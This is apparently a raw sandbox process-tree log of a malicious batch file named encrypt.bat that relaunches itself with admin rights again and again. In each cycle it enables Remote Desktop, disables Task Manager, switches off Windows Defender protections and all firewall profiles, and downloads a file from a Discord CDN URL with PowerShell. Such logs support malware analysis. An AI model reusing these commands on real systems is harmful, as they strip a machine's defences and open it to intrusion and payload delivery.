C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f42⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"42⤵PID:4720
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f42⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:2444
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable42⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE42⤵PID:3816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off42⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off42⤵PID:4976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off42⤵PID:1212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off42⤵PID:2680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off42⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"42⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"42⤵
- Blocklisted process makes network request
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"42⤵
- Modifies registry class
PID:3588 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"43⤵PID:1376
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"44⤵PID:132
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f44⤵PID:2808
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"44⤵PID:3404
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f44⤵PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:32
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵
- Command and Scripting Interpreter: PowerShell
PID:8
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable44⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE44⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off44⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off44⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off44⤵
- Modifies Windows Firewall
PID:4012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off44⤵PID:2912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off44⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"44⤵
- Command and Scripting Interpreter: PowerShell
PID:1572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:3768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"44⤵
- Blocklisted process makes network request
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"44⤵
- Modifies registry class
PID:4812 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"45⤵PID:4284
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"46⤵PID:1432
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f46⤵PID:1108
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"46⤵PID:1976
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f46⤵PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:5032
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable46⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE46⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off46⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off46⤵PID:1060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off46⤵PID:1736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off46⤵PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off46⤵PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"46⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:3644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"46⤵
- Blocklisted process makes network request
PID:1948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"46⤵
- Modifies registry class
PID:3980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"47⤵PID:2072
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"48⤵PID:4064
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f48⤵PID:2248
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"48⤵PID:2328
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f48⤵PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:3092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable48⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE48⤵PID:1216
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off48⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off48⤵PID:3192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off48⤵PID:3404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off48⤵PID:4444
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off48⤵PID:4204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"48⤵
- Command and Scripting Interpreter: PowerShell
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:1180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"48⤵
- Blocklisted process makes network request
PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"48⤵PID:2748
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"49⤵PID:236
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"50⤵PID:3952
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f50⤵PID:3276
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"50⤵PID:1084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f50⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:3480
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable50⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE50⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off50⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off50⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off50⤵PID:1704
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off50⤵PID:676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off50⤵PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"50⤵PID:132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"50⤵
- Blocklisted process makes network request
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"50⤵
- Modifies registry class
PID:1404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"51⤵PID:4216
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"52⤵PID:2856
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f52⤵PID:4024
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"52⤵PID:4848
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f52⤵PID:1408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:1716
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable52⤵PID:1060
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE52⤵PID:4068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off52⤵PID:2956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off52⤵PID:328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off52⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off52⤵
- Modifies Windows Firewall
PID:3192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off52⤵PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"52⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:32
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"52⤵
- Blocklisted process makes network request
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"52⤵PID:1664
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"53⤵PID:3192
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"54⤵PID:1748
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f54⤵PID:2340
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"54⤵PID:236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f54⤵PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵
- Command and Scripting Interpreter: PowerShell
PID:2040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:3092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵
- Command and Scripting Interpreter: PowerShell
PID:3164
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable54⤵PID:2372
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE54⤵PID:2540
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off54⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off54⤵PID:452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off54⤵PID:3952
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off54⤵PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off54⤵PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"54⤵PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"54⤵
- Blocklisted process makes network request
PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"54⤵PID:4056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"55⤵PID:3716
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"56⤵PID:5056
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f56⤵PID:2452
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"56⤵PID:3644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f56⤵PID:1504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵PID:3876
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable56⤵
- Modifies Windows Firewall
PID:2376
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE56⤵PID:2756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off56⤵PID:1688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off56⤵PID:4660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off56⤵PID:2372
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off56⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off56⤵PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"56⤵PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:3568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵
- Command and Scripting Interpreter: PowerShell
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"56⤵
- Blocklisted process makes network request
PID:3564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"56⤵PID:4776
-
